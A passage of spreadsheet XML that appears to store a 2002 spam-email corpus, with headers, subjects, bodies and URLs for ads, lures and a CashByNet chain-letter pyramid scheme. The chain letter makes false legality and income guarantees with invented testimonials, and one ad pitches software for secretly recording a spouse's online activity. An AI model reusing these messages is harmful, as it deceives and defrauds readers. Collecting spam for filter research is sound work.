    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1DD90E_01C200E4.C0E7B7B0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Feel The Power	  Power 7 Bonus Annuity	 Year 1 	12.35% 	 Premium Bonus Immediately 	7.00% 	 Effective 5 Year Yield 	6.43% 	 Commission 	6.00% (0 - 85) NQ-Q 	  800-880-3072 Call or visit our web site  today! 	 Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	  	  	 	   	    	We don't want anybody to receive our mailing who does not wish to receive them. This is a professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal Notice   	 ------=_NextPart_000_1DD90E_01C200E4.C0E7B7B0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Feel The Power! =20       =20          =20              =20              =20             =20               Year 1 =20               12.35% =20             =20               Premium Bonus Immediately =20               7.00% =20             =20               Effective 5 Year Yield =20               6.43% =20             =20               Commission =20               6.00% (0 - 85) NQ-Q =20                            Call or visit our web site = today! =20             =20                =20                    =20                        =20                           Please fill out the = form below for more information =20                           Name: =20                              =20                           E-mail: =20                              =20                           Phone: =20                              =20                           City: =20                              State: =20                              =20                             =20                                =20                              =20              We=20               don't want anybody to receive our mailing who does not = wish to receive=20               them. This is a professional communication sent to = insurance professionals.=20               To be removed from this mailing list, DO NOT REPLY to this = message.=20               Instead, go here: [URL]http://www.insurancemail.net[/URL] Legal = Notice=20              ------=_NextPart_000_1DD90E_01C200E4.C0E7B7B0--</t>
  </si>
  <si>
    <t>4936</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netway.com&gt;\nFrom: "Jordan" &lt;lo4kirt7q37@hotmail.com&gt;\nDate: Tue, 21 May 2002 18:55:49 -1900</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 18:55:49 -1900</t>
  </si>
  <si>
    <t>"Jordan" &lt;lo4kirt7q37@hotmail.com&gt;</t>
  </si>
  <si>
    <t>&lt;yyyy@netway.com&gt;</t>
  </si>
  <si>
    <t>Secretly Record all internet activity on any computer... TAF</t>
  </si>
  <si>
    <t>FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!\n\nIs your spouse cheating online? \n\nAre your kids talking to dangerous people on instant messenger?\n   \nFind out NOW! - with Big Brother instant software download.\n\n\nClick on this link NOW to see actual screenshots and to order!\n[URL]http://213.139.76.69[/URL]\n\n\n\n\n\n\n\n\n\nTo be excluded from future contacts please visit:\n[URL]http://213.139.76.69[/URL]\nbacalau</t>
  </si>
  <si>
    <t>http://213.139.76.69 http://213.139.76.69</t>
  </si>
  <si>
    <t>4928</t>
  </si>
  <si>
    <t>To: "Zofia"\nFrom: "rathcairn" &lt;rathcairn@eircom.net&gt;\nDate: Tue, 21 May 2002 16:08:40 +0100</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 16:08:40 +0100</t>
  </si>
  <si>
    <t>"rathcairn" &lt;rathcairn@eircom.net&gt;</t>
  </si>
  <si>
    <t>"Zofia"</t>
  </si>
  <si>
    <t>=?iso-8859-1?Q?Fw:_CD_Nua_do_dhamhsa=ED_Ch=E9il=ED?=</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_00AF_01C200E1.C5BDFF40 Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ----- Original Message -----=20 From: rathcairn=20 To: Automail Script ; Automail Script ; astraea@iol.ie ; =C5se Tobin ; = araben16313168@hotmail.com ; aofarachain@tinet.ie ; = aofarachain@eircom.net ; Anthony Gorman ; Ann-Mari Bergkvist ; Annemarie = Meehan ; annemarie mcdonnell ; anne7172@arabia.com ; Anna Swelund ; Anna = Ni Thuama ; ann faherty ; anewloan@mail.ru ; Andy Plunkett ; Andrew = Delany ; Andrea Nic Oscair ; An Fhiontarlann ; amurtagh@tinet.ie ; = Amanda N=ED Ghuidhir ; als2@hotmail.com ; alpha@fun.21cn.com ; Allen = Moira ; Allen Carberry ; alex_doyle@ie.ibm.com ; Alan McGowan ; Alain = Civel ; Aishling N=ED Raghallaigh ; =C1ine M=E1ire N=ED Choile=E1in ; = AINE GUILFOYLE ; ailin.nichuir@ucd.ie ; Ail=EDn N=ED h=D3g=E1in ; Aileen = O'Meara, RTE ; advisor@physiciansblend.net ; adshwe@bekkers.com.au ; = adrian28@esatclear.ie ; Admin ; Ade Kallas ; adare productions ; = abqewvbgf@iinet.net.au ; aa1133777@yahoo.com ; = a_crothers@looksmart.com.au ; 89ok7yumhjn@msn.com ; 12unidiploma@msn.com = ; 0gbvll2jf@solvo.spb.su ; Daithi Mac Carthaigh ; d7596@go.ru ; = d23463@portugalmail.com=20 Cc: 09886w@ams.com.br ; 0815@activate.de ; 01bb91b2.7e887960@genesys.pt = ; 00luke@upline.se=20 Sent: Tuesday, May 21, 2002 3:47 PM Subject: CD Nua do dhamhsa=ED Ch=E9il=ED A chara, Email gairid le cur in i=FAl duit faoi Dhl=FAthdhiosca Nua at=E1 ar = f=E1il dona damhsa=ED Ch=E9il=ED is coitianta i measc daoine =F3ga. =20 T=E1 Ceol ar dona Damhsa=ED seo a leanas : Balla=ED Luimn=ED Briseadh na Carraige Baint an Fh=E9ir Ionsa=ED na hInse Port an Fh=F3mhair Cor na S=EDog R=E9ic=ED Mh=E1la Tonna=ED Thora=ED Droichead =C1tha Luain Staic=EDn Eorna Se=E1in=EDn Cor Beirte Shoe the Donkey Waltzes=20 agus eile Is f=E9idir an CD a cheannach tr=EDd [URL]www.damhsa.com[/URL] n=F3 086 8339082 Le meas, Brian =D3 Broin ------=_NextPart_000_00AF_01C200E1.C5BDFF40 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable   ----- Original Message -----=20 From: rathcairn=20 To: Automail=20 Script ; Automail=20 Script ; astraea@iol.ie ; =C5se Tobin ; araben16313168@hotmail.com ; aofarachain@tinet.ie ; aofarachain@eircom.net ; Anthony=20 Gorman ; Ann-Mari Bergkvist ; Annemarie Meehan ; annemarie mcdonnell ; anne7172@arabia.com ; Anna=20 Swelund ; Anna Ni Thuama ; ann faherty=20 ; anewloan@mail.ru ; Andy=20 Plunkett ; Andrew=20 Delany ; Andrea Nic Oscair ; An=20 Fhiontarlann ; amurtagh@tinet.ie ; Amanda N=ED=20 Ghuidhir ; als2@hotmail.com ; alpha@fun.21cn.com=20 ; Allen Moira=20 ; Allen = Carberry ; alex_doyle@ie.ibm.com ; Alan McGowan ; Alain=20 Civel ; Aishling N=ED Raghallaigh ; =C1ine M=E1ire N=ED = Choile=E1in ; AINE=20 GUILFOYLE ; ailin.nichuir@ucd.ie ; Ail=EDn N=ED=20 h=D3g=E1in ; Aileen=20 O'Meara, RTE ; advisor@physiciansblend.net ; adshwe@bekkers.com.au ; adrian28@esatclear.ie ; Admin = ; Ade Kallas ; adare = productions ; abqewvbgf@iinet.net.au ; aa1133777@yahoo.com ; a_crothers@looksmart.com.au ; 89ok7yumhjn@msn.com ; 12unidiploma@msn.com ; 0gbvll2jf@solvo.spb.su ; Daithi Mac Carthaigh ; d7596@go.ru ; d23463@portugalmail.com  Cc: 09886w@ams.com.br ; 0815@activate.de ; 01bb91b2.7e887960@genesys.pt ; = 00luke@upline.se=20 Sent: Tuesday, May 21, 2002 3:47 PM Subject: CD Nua do dhamhsa=ED Ch=E9il=ED A chara,   Email gairid le cur in = i=FAl duit faoi=20 Dhl=FAthdhiosca Nua at=E1 ar f=E1il dona damhsa=ED Ch=E9il=ED is = coitianta i measc daoine=20 =F3ga.   T=E1 Ceol ar dona = Damhsa=ED seo a leanas=20 :   Balla=ED = Luimn=ED Briseadh na = Carraige Baint an = Fh=E9ir Ionsa=ED na = hInse Port an = Fh=F3mhair Cor na = S=EDog R=E9ic=ED = Mh=E1la Tonna=ED = Thora=ED Droichead =C1tha = Luain Staic=EDn = Eorna Se=E1in=EDn Cor Beirte Shoe the = Donkey Waltzes  agus eile   Is f=E9idir an CD a = cheannach tr=EDd [URL]www.damhsa.com[/URL] n=F3 086 = 8339082   Le meas,     Brian =D3 = Broin   ------=_NextPart_000_00AF_01C200E1.C5BDFF40--</t>
  </si>
  <si>
    <t>www.damhsa.com www.damhsa.com</t>
  </si>
  <si>
    <t>4930</t>
  </si>
  <si>
    <t>To: &lt;vefzx@doar.net&gt;\nFrom: julie344188@mail.ru\nDate: Tue, 21 May 2002 16:03:08 -0500</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 16:03:08 -0500</t>
  </si>
  <si>
    <t>julie344188@mail.ru</t>
  </si>
  <si>
    <t>&lt;vefzx@doar.net&gt;</t>
  </si>
  <si>
    <t>please help, new webcam/ modeling page</t>
  </si>
  <si>
    <t>I just got a webcam and computer for my birthday and I just finished\nmy first homepage. I added some of my modeling pictures there so if you\nthink you can help my career please let me know. I could also use some\nopinions on how to make my site look better. If you can't help and you know\nsomeone that can, please forward them this e-mail. I need money and can sure\nuse the work. I just added my most recent set of pictures.\n\nIf you don't want to look at my pics,  I am 5'5 125, blonde hair, blue eyes\nand I play volleyball.\n\nLink to my site: [URL]http://63.107.112.67[/URL]\n\nThanks,\nJulie\n\nOh, if you do not know who I am and I sent this e-mail to you by mistake\nplease disregard it. If you would like to make sure to be removed from my\naddress book, please click here [URL]http://63.107.112.67[/URL]\nand i have a program to make sure I do not send you more mail.Sorry I will\nnot ever try talking to you again!</t>
  </si>
  <si>
    <t>http://63.107.112.67 http://63.107.112.67</t>
  </si>
  <si>
    <t>4926</t>
  </si>
  <si>
    <t>To: "'yyyyason@netnoteinc.com'" &lt;yyyyason@netnoteinc.com&gt;\nFrom: "Garry Barcoe, Net Nation IT" &lt;gbarcoe@netnation.ie&gt;\nDate: Tue, 21 May 2002 14:57:18 +0100</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 14:57:18 +0100</t>
  </si>
  <si>
    <t>"Garry Barcoe, Net Nation IT" &lt;gbarcoe@netnation.ie&gt;</t>
  </si>
  <si>
    <t>"'yyyyason@netnoteinc.com'" &lt;yyyyason@netnoteinc.com&gt;</t>
  </si>
  <si>
    <t>Candidate update 21.05.02</t>
  </si>
  <si>
    <t>Dear Justin,	\n					\n\nNet Nation IT Recruitment Candidate Update Newsletter\n\nOur goal is to help you achieve your companies goals by providing you with\nthe best candidates on the job market today, with excellent and professional\nservice.\n\n[URL]www.netnation.ie[/URL]						Tel: 01 635\n9760\n\nThis month Justin, we have excellent IT candidates available, along with\nsome excellent IT Sales Super Stars. \n\n**Stop Press** \n\nNet Nation IT Recruitment will save up money on your contracting rates.\nCall us now on 01 6359760 with your latest IT contracting jobs!\n\nNet Nation is a member of the National Recruitment Federation which is a\nstandard of credibility and strong ethical standing within the Irish\nRecruitment industry. \n\n\n******\n\nRDBMS/Project Managers/Mainframe.	Garry Barcoe gbarcoe@netnation.ie\nTel: 01 635 9760\n\nOracle Developer:	4 years PL/SQL, Forms and Reports 6i and Designer\n2000 exp. Gb01\n\nRPG Programmer:	10+ years exp in all industries. Good grounding in ERP\nsystems including JD Edwards.\n\nSenior Operations Manager:	15+ years exp. Mainframe, Network, Desktop\nand Development Background in Financial arena. Gb03\n\nSenior AS400 Contractor:	13 years exp. Areas of expertise includes\nAS400, NT and Citrix as well as various anti-virus and email systems.\nImmediately available! Gb04\n\n\n\n[URL]www.netnation.ie[/URL]\n\n\n******\n\nNetworking/ PC Support	Conor Walsh cwalsh@netnation.ie Tel:01 635 9760\n\nUnix Administrator:	8 yrs exp., Solaris, HP UX, Sco, Aix, Oracle 7 &amp; 8i,\nSQL, NT/2000 Cw01\n\nSnr. Systems Admin: 10 yrs exp. Unix (Solaris), NT/2000, AS400, Cisco,\nNetworking, PABX, Security, Firewalls, SAP, Mgmt experience, Internet Cw02\n\nTechnical Support: 1-year exp., NT &amp; Win.2000, Networking, TCP/IP, Exchange,\nEager, Great Attitude Cw03\n\nCisco Contractor: CCNP/CCDP/CCNA, Full range of Cisco and Juniper Routers.\nImmediately Available! CW04\n\n******\n\nIT Sales/Business Development Gerry Nolan gnolan@netnation.ie\nTel:01 635 9760\n\nSales Manager: Very experienced Sales Manager in software and consulting\nareas. Strong blue chip experience. Excellent sales and people management\nskills Ref Gn01\n\nBusiness Development Manager: Telecoms sector, strong track record in\nhardware sales. Good experience in the Irish market place. Ref Gn02\n\nSales/Account Manager: IT consulting sales. Background in hardware sales.\nSeeking senior IT Sales or Account Manager role. Ref Gn03\n\nSoftware Development: Cathal O Donnell codonnell@netnation.ie  Tel: 635 9760\n\nJava Developer:	4 years experience developing with Java, EJB, JSP, J2EE, XML\nwith Oracle experience working on NT and Unix. Co01\n\nVB Developer:	10 years experience in the IT sector. Key skills include VB,\nJava, Oracle, SQL and Access. Has worked with Windows and Unix primarily in\nthe financial sector. Co02\n\nSoftware Developer:	C++ Contract Developer worked in manufacturing and\nfinancial sectors. Key skills include C++, VB, COM, DCOM, COM+, UML, Oracle,\nSql Server, Unix and NT. Immediately available!\n\n*********************************************************************\n\nJustin If you require more details on any of the candidates listed or have\nany other IT or Sales positions please call us now on 01 635 9760 or email\nus on jobs@netnation.ie  \n\nFor more details on Net Nation visit our web site [URL]www.netnation.ie[/URL]\n\n\nWe have sent you this newsletter with the view that it will be relevant to\nyour business. If you do not wish to receive this newsletter please reply\nwith REMOVE in the subject title.\n\n\nRegards\nGarry Barcoe\n\nNet Nation IT Recruitment\n68 Pearse Street\nDublin 2\nTel: 01 635 9760\njobs@netnation.ie\n[URL]www.netnation.ie[/URL]</t>
  </si>
  <si>
    <t>www.netnation.ie www.netnation.ie www.netnation.ie www.netnation.ie</t>
  </si>
  <si>
    <t>4933</t>
  </si>
  <si>
    <t>To: Registrant28@mandark.labs.netnoteinc.com\nFrom: &lt;connie.bester@fresnomail.com&gt;\nDate: Tue, 21 May 2002 14:21:02 -0900</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 14:21:02 -0900</t>
  </si>
  <si>
    <t>&lt;connie.bester@fresnomail.com&gt;</t>
  </si>
  <si>
    <t>Registrant28@mandark.labs.netnoteinc.com</t>
  </si>
  <si>
    <t>BIZ, .INFO, .COM for only $14.95</t>
  </si>
  <si>
    <t>IMPORTANT INFORMATION:\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affordable-domains.com[/URL] today for more info.\n \nRegister your domain name today for just $14.95 at: [URL]http://www.affordable-domains.com[/URL] Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.\n \nSincerely,\n \nDomain Administrator\nAffordable Domains\n\n\nTo remove your email address from further promotional mailings from this company, click here:\n[URL]http://www.centralremovalservice.com[/URL]\n\n\n9358vISa9-l9</t>
  </si>
  <si>
    <t>http://www.affordable-domains.com http://www.affordable-domains.com http://www.centralremovalservice.com</t>
  </si>
  <si>
    <t>4920</t>
  </si>
  <si>
    <t>To: "" &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "Yana Korshun"&lt;yana_korshun@mail.ru&gt;\nDate: Tue, 21 May 2002 09:53:34 +0400</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 09:53:34 +0400</t>
  </si>
  <si>
    <t>"Yana Korshun"&lt;yana_korshun@mail.ru&gt;</t>
  </si>
  <si>
    <t>"" &lt;yyyy@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>digital voice recorders</t>
  </si>
  <si>
    <t>Dear Sir/Madam\n\nOur company is designer and manufacturer of digital voice recorders (DVR) Edic-mini [URL]http://www.telesys.ru[/URL] with extraordinary characteristics:\nEdic-mini model A - the smallest size over the world (17x57x10 mm), up to 1120 min of record time.\nEdic-mini model B - the longest battery life (up to 70 hours in record mode, metal case 27x54x7 mm), up to 1120 min of recording time.\nEdic-mini model B1 - the roundest DVR in the world :-) (metal case d=30 mm, h=14 mm), up to 1120 min of recording time.\nEdic-mini model C - the longest recording time (up to 8960 min =149 hours), metal case 27x54x10 mm.\n   Coming soon:\nEdic-mini model S - stereo digital voice recorder.\nEdic-mini BW1 - round wood (juniper) case (for lovers of juniper fragrance :-), the most stylish DVR in the world.\n\nAll digital voice recorders have extremely high voice sensitivity, digital PC interface, telephone line interface to record phone conversations, programmable user's interface, ability of using it for data storage and transfer (capacity from 16Mbyte to 1Gbyte).\n\nAlso we produce voice modules (assembled PCB only) EMM [URL]http://www.telesys.ru[/URL], which are Edic-mini compatible and allow you to create your own solution of unique DVR.\n\nWe are looking for dealers for selling our product, but pls note, that we don't offer cheap product, we offer unique one - it has no competitors in the word market now. We are ready to design and produce any kind of DVR upon your request. Low volume order (100+) is acceptable too.\n\nWelcome to our website [URL]http://www.telesys.ru[/URL] to get more information.\n\n*** Sorry, if this information isn't interesting for you. To remove your address from our mailing list pls return this e-mail back with REMOVE in subject field .\n\nThank you.\n\nWith best regards,\n-------------------------------------\nYana Korshun,\nSales manager of "Telesystems"\nE-mail: isales@telesys.ru\nWWW site in Russian: [URL]http://www.telesys.ru[/URL]\nWWW site in English: [URL]http://www.telesys.ru[/URL]\n\n\n\n\n\n\nNEVER SEND SPAM. IT IS BAD.</t>
  </si>
  <si>
    <t>http://www.telesys.ru http://www.telesys.ru http://www.telesys.ru http://www.telesys.ru http://www.telesys.ru</t>
  </si>
  <si>
    <t>4924</t>
  </si>
  <si>
    <t>To: yyyy@netcom20.netcom.com, yyyy@netmore.net, yyyy@netnoteinc.com, yyyy@nevlle.net\nFrom: yyyy@news4.inlink.com ()\nDate: Tue, 21 May 2002 09:22:41 -0400</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 09:22:41 -0400</t>
  </si>
  <si>
    <t>yyyy@news4.inlink.com ()</t>
  </si>
  <si>
    <t>yyyy@netcom20.netcom.com, yyyy@netmore.net, yyyy@netnoteinc.com, yyyy@nevlle.net</t>
  </si>
  <si>
    <t>WHAT HAPPENED TO YOU??? -       982244611</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by\n (jm@news4.inlink.com) on Tuesday, May 21, 2002 at 09:22:41\n---------------------------------------------------------------------------\n\n: \n[URL]www.THOMB.com[/URL] is the only free site that is entirely made up of British babes. Over 10,000 fresh pictures of the UK's sexiest girls, more than any other site out there.\n\nNo Credit Card.\nOnly Free Galleries.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n25155843&amp;&amp;25155843-25155843\n---------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>www.THOMB.com</t>
  </si>
  <si>
    <t>4921</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: knb4menu@charter.net\nDate: Tue, 21 May 2002 03:56:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 21 May 2002 03:56:53 -0400 (EDT)</t>
  </si>
  <si>
    <t>knb4menu@charter.net</t>
  </si>
  <si>
    <t>HELLO $NAME</t>
  </si>
  <si>
    <t>Return-Path:  Received: from [216.35.187.6] (HELO webmillion.com)   by mx12.cluster1.charter.net (CommuniGate Pro SMTP 3.5.9)   with ESMTP id 4992751 for knb4menu@charter.net; Fri, 26 Apr 2002 08:09:39 -0400 Received: from es-wmstage1 [216.35.187.6] by webmillion.com with ESMTP   (SMTPD32-6.04) id ADFB9700C8; Fri, 26 Apr 2002 04:55:33 -0700 Received: from mail pickup service by es-wmstage1 with Microsoft SMTPSVC; 	 Fri, 26 Apr 2002 02:12:54 -0700 From: "webMillion"  To:  Subject: Hello Date: Fri, 26 Apr 2002 02:12:54 -0700 X-Priority: 3 X-MSMail-Priority: Normal Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Message-ID:  X-OriginalArrivalTime: 26 Apr 2002 09:12:54.0431 (UTC) FILETIME=[8C6632F0:01C1ED02] Copyright CashByNet 2000 ([URL]http://www.cashbynet.net[/URL] .If you're sick of scams, then read this, and do what it says. I WILL MAKE YOU A PROMISE. Read this email to the end, follow the instructions, and you won't have to worry about funding your retirement, having money to play, or making ends meet... EVER. I know what you are thinking. I never responded to one of these before either. Then one day I realized that I throw away $25 going to a movie for 2 hours with my wife, why not try investing this same $25 in a system that just might work. I don't know why that day I decided to take a chance, but I can't even come close to imagining if I hadn't - I guess I'd still be poor. Read on.  It's true. Every word of it. It's legal, and it's ethical. Not only are you making money from your own business, you're helping other people achieve their goals and fulfill their dreams. Give it a shot, you'll see there is absolutely no way you won't get AT LEAST a modest return on your start up capital. Okay - here's the scoop on CashByNet (CBN): ================================================== Due to the popularity of this particular email business, and the business potential of the Internet, a national weekly news program recently devoted an entire show to the investigation of this program to see if it's legal, and if it really can make people money. Their findings proved that there are "absolutely NO LAWS prohibiting the participation in the program, and if people can follow a few simple instructions they are bound to make amazing returns with only $25 in startup costs." DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.  THE MORE PEOPLE WHO PARTICIPATE, THE BETTER OFF YOU BECOME, AND THE MORE INCOME YOU WILL MAKE. This is what one had to say: "I was approached many times before to participate in Cash By Net, but each time I passed on it. One day I decided that instead of going out that night, I would take the money I would have spent - invest it in this business, and see if it was as lucrative as everyone claimed. Two weeks went by . . . . nothing.  Three weeks . . . . $50 dollars rolled in.  At this point I was just relieved to get my money back. Then it happened - One week after this, I opened my mailbox to find $580 in $5 bills waiting for me.  Its been about 8 months now, and I just bought a new Mercedes . . . black :)  The startup costs are so small, and the time involved is less than 5 hours per week. Give it a shot - what do you have to lose?" Pam Hedland, South Bound Brook, New Jersey. ================================================== Another said: "Programs like this have been around for a long time but I never believed in them. But this year I won a $50 bet on the Patriots to win the Super Bowl.  I got this email the following morning, and I felt like gambling.  I spent $25 ordering the reports, and the other $25 paying a parking ticket.  I followed the instructions meticulously - I thought I would at least get my original $25 back. As soon as I got the email out, not One week went by before I quadrupled my $25.  I'd take that over the Patriots any day.  I got excited, and that's when it started to explode.  In less than 6 weeks I was already up $9500 bucks.  It's been almost 4 months, and the flow hasn't stopped. On an average day, I get anwhere from $500 - $1500 in the mail.  I always say that everything happens for a reason, and I feel that this was meant to be, maybe it is for you too. Just stick to the steps, do everything it says - and all of your hopes and dreams will be real - I promise." Greg Moran, Boston, MA. For more success stories and photos, go to [URL]http://www.cashbynet.net[/URL] $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ FOLLOW THE SIMPLE INSTRUCTION BELOW AND YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED. BE SURE TO SAVE A COPY OF THIS EMAIL AS A TEXT DOCUMENT FOR REFERENCE!!!! INSTRUCTIONS: =====Order all 5 reports from your personal CBN money list below ===== For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the person whose name appears ON THAT LIST next to the report. MAKE SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of any mail problems. === MAKE SURE YOU ORDER EACH OF THE 5 REPORTS === You will need all 5 reports so that you can save them on your computer and redistribute them. YOUR TOTAL START UP INVESTMENT: $5 X 5 = $25.00. Within a few days you will receive, via e-mail, each of the 5 reports from these 5 different individuals. Save them on your computer so they will be accessible for you to send to the 1,000's of people who will order them from you. Also make a floppy of these reports and keep it on your desk in case something happens to your computer. IMPORTANT - DO NOT ALTER THE NAMES OR SEQUENCE OF THE PEOPLE WHO ARE LISTED NEXT TO EACH REPORT.  FOLLOW THE INSTRUCTIONS 1-6 VERY CLOSELY OR YOU WILL LOSE OUT ON THE MAJORITY OF THE PROFIT WHICH IS DUE TO YOU!! Once you understand the way this works, you will also see how it does not work if you alter it. Remember, this method has been tested, and proved and if you alter it, it will NOT work !!! This is a legitimate BUSINESS. You are offering a product for sale and getting paid for it. Treat it as such and you will be VERY profitable in a short period of time, and have something many people can't - a profitable business enterprise (and more money to do WHATEVER YOU COULD POSSIBLY WANT). For more information go to [URL]http://www.cashbynet.net[/URL] ================================================== HERE IS YOUR PERSONAL CBN MONEY LIST : ================================================== REPORT# 1: 'The Insider's Guide To Advertising for Free On The Net Order Report #1 from: Chris King 905 HWY 321 NW PMB 131 Hickory, NC 28601 _______________________________________________________ REPORT # 2: The Insider's Guide To Sending Bulk Email On The Net Order Report # 2 from: Greg Ferris 264 S. Cienega Blvd. #1066 Beverly Hills, CA 90211 USA _______________________________________________________ REPORT # 3: Secret To Multilevel Marketing On The Net Order Report # 3 from : Tami C. Ickes 1667 Cumberland Road Bedford, PA 15522 USA _______________________________________________________ REPORT # 4: How To Become A Millionaire Using MLM &amp; The Net Order Report # 4 from: B. Turner 60 McKerrell Way SE Calgery, Alberta, Canada T2Z 1R7 _______________________________________________________ REPORT #5: How To Send Out One Million Emails For Free Order Report # 5 From: J.Thomas 16 Spaulding Ave. Scituate, Ma. 02066 USA _______________________________________________________ ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always send $5 USD cash for each Report. Checks NOT accepted. Make sure the cash is concealed by wrapping it in at least 2 sheets of paper. On one of those sheets of paper, Write the NUMBER &amp; the NAME of the Report you are ordering, YOUR E-MAIL ADDRESS, your name AND postal address. _______________________________________________________ PLEASE READ ON . . . ======================= IMPORTANT!! STEPS 1-6 ======================= 1.. After you have ordered all 5 reports from your CBN money list, take this original saved email and REMOVE the name &amp; address of the person in REPORT # 5.  This person has made it through the cycle and is no doubt counting their fortune. 2.. Move the name &amp; address in REPORT # 4 down TO REPORT # 5. 3.. Move the name &amp; address in REPORT # 3 down TO REPORT # 4. 4.. Move the name &amp; address in REPORT # 2 down TO REPORT # 3. 5.. Move the name &amp; address in REPORT # 1 down TO REPORT # 2 6.. Insert YOUR name &amp; address in the REPORT # 1 Position. PLEASE MAKE SURE you copy every name &amp; address ACCURATELY! This is critical to YOUR success. ================================================== **** SAVE THE NEW MODIFIED EMAIL, AS THIS WILL BE THE OFFICIAL DOCUMENT WHICH YOU WILL SEND TO PROSPECTIVE CUSTOMERS. BE SURE TO HAVE YOUR NAME IN THE #1 POSITION AND THAT YOU DO NOT MAKE ANY OTHER CHANGES TO THIS DOCUMENT. THIS IS CRITICAL TO THE PERFORMANCE OF YOUR BUSINESS AND SUBSEQUENTLY THE SIZE OF YOUR PROFITS.**** As soon as you receive all 5 reports via email SAVE A COPY OF THEM! These are the products that your customers are paying for. Not only do these reports hold the secrets and instructions for your new venture, you will be redistributing them to customers when you receive payment. To assist you with marketing your business on the internet, the 5 reports will provide you with valuable marketing information on how to send bulk e-mails legally, where to find thousands of free classified ads and much more. There are 2 Primary methods you will use to get this venture going: METHOD # 1: BY SENDING BULK E-MAIL LEGALLY ================================================== Let's say that you decide to start small, just to see how it goes, and we will assume You and those involved send out only 5,000 e-mails each. Let's also assume that the mailing receive only a 0.2% (2/10 of 1%) response (the response could be much better but lets just say it is only 0.2%). Also many people will send out hundreds of thousands e-mails instead of only 5,000 each). Continuing with this example, you send out only 5,000 e-mails. With a 0.2% response, that is only 10 orders for report # 1.  Those 10 people responded by sending out 5,000 e-mail each for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded with orders. That's=100 people responded and ordered Report # 2. Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for Report # 3. Those 1000 people send 5,000 e-mail each for a total of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Report # 4. Those 10,000 people send out 5,000 e-mails each for a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000 orders for Report # 5. THAT'S 100,000 ORDERS TIMES $5 EACH = $500,000.00 (half a million dollars). Your total income in this example is: 1..... $50 + 2..... $500 + 3..... $5,000 + 4..... $50,000 + 5.... $500,000 .... Grand Total=$555,550.00 REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen if everyone or half or even one 4th of those people mailed 100,000 e-mails each or more? THE NUMBERS DON'T LIE. VISIT CBN AT [URL]http://www.cashbynet.net[/URL] to plug in your own numbers and see the results. METHOD # 2: BY PLACING FREE ADS ON THE INTERNET ================================================== Advertising on the net is extremely inexpensive and there are hundreds of FREE places to advertise. Placing a lot of free ads on the Internet will easily get a larger response than just emails alone. We strongly suggest you start with Method # 1 and add METHOD #2 as you begin to become more knowledgeable about the business and study the 5 reports. Remember to always provide same day service on all orders to ensure proper return on the back end - this means quicker profits for you. $$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$ Follow these guidelines to guarantee your success: === If you do not receive at least 10 orders for Report #1 within 2 weeks, continue sending e-mails until you do. === After you have received 10 orders, 2 to 3 weeks after that you should receive 100 orders or more for REPORT # 2. If you did not, continue advertising or sending e-mails until you do. **ONCE YOU HAVE RECEIVED 100 OR MORE ORDERS FOR REPORT # 2, YOU CAN RELAX, because the system is already working for you, and the cash will continue to roll in ! THIS IS IMPORTANT TO REMEMBER: Every time your name is moved down on the list, you are placed in front of a different report. You can KEEP TRACK of your PROGRESS by watching which report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There is NO LIMIT to the income you can generate from this business !!! ================================================= FOLLOWING IS A NOTE FROM THE ORIGINATOR OF CASH BY NET: Cash By Net has become a very popular business for many sole proprietors.  However, this program will only work if you are willing to put in the time and effort to make it work.  This is not a program for everybody.  If you are just a passer by, and don't have a personal vision of success, delete this now.  Life all comes down to a few opportunities - this is one of them. Have the courage to be free, and have the drive to reach your goals.  Before you start working with us, take 10 minutes and write down your personal goals.  What do you want in 5 years? 1 year? 6 months? Be realistic - set your goals high enough so you will work hard to reach them. Remember: You are the owner of your own destiny, make these goals become reality - only 